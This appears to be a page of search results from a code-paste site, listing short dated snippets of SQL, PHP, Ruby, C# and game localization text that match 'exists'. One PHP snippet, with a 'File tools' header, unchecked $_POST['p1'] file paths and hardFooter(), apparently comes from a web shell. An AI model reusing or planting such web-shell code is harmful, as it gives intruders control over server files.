42.7K results in 788 ms
5 years ago · Sep 15, 2020, 03:26 PM
null) { logger::warn("ADD TAGS", " Could not create tag",$t); return false; } if ($result = generic_sql_query("INSERT INTO TagListtable
5 years ago · Sep 15, 2020, 12:48 PM
do context 'when from_url exists in to_url' do let!(:existed_redirect) do create :company_redirect, from_url: company_redirect.to_url, company:
5 years ago · Sep 15, 2020, 12:46 PM
do context 'when from_url exists in to_url' do let!(:existed_redirect) do create :company_redirect, from_url: company_redirect.to_url, company:
5 years ago · Sep 15, 2020, 12:46 PM
do context 'when from_url exists in to_url' do let!(:existed_redirect) do create :company_redirect, from_url: company_redirect.to_url, company:
5 years ago · Sep 15, 2020, 09:26 AM
NOTICE 'dest schema % already exists!', dest_schema; RETURN ; END IF; EXECUTE 'CREATE SCHEMA ' || quote_ident(dest_schema) ; -- Create tables
5 years ago · Sep 14, 2020, 07:32 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
5 years ago · Sep 14, 2020, 03:48 PM
true upon serialization. // Additionally, if the table array has not been allocated, this // field
5 years ago · Sep 14, 2020, 03:48 PM
Query // Checks to see if a user already exists in the users table function NewUser(DiscordID) { UpdateLogFile('Function Call:
5 years ago · Sep 14, 2020, 02:08 PM
Query // Checks to see if a user already exists in the users table function NewUser(DiscordID) { UpdateLogFile('Function Call:
5 years ago · Sep 14, 2020, 01:28 AM
that is edible, even if it's not good for you", "advancements.husbandry.complete_catalogue.title":
5 years ago · Sep 14, 2020, 01:20 AM
that is edible, even if it's not good for you", "advancements.husbandry.complete_catalogue.title":"A
5 years ago · Sep 12, 2020, 08:30 PM
create table stuff */ create table if not exists category ( id serial not
5 years ago · Sep 12, 2020, 02:52 PM
that is edible, even if it's not good for you", "advancements.husbandry.complete_catalogue.title":"A
5 years ago · Sep 12, 2020, 08:48 AM
filename first"); return; } // check if file exists if(!File.Exists(filename)) { MessageBox.Show(string.Format("{0} does not exist", filename)); return; } int
5 years ago · Sep 11, 2020, 09:44 PM
SET @tier=115; -- cleanup DROP TABLE IF EXISTS item_template_backup; CREATE TABLE item_template_backup LIKE item_template;
5 years ago · Sep 11, 2020, 09:42 PM
SET @tier=115; -- cleanup DROP TABLE IF EXISTS item_template_backup; CREATE TABLE item_template_backup LIKE item_template;
5 years ago · Sep 11, 2020, 06:38 PM
CREATE TABLE IF NOT EXISTS countryCapital ( countryCode CHAR(3) NOT
5 years ago · Sep 11, 2020, 03:38 PM
USE `mydb` ; -- ----------------------------------------------------- -- Table `mydb`.`person` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `mydb`.`person` ( `id` INT NOT
Total pages: 2134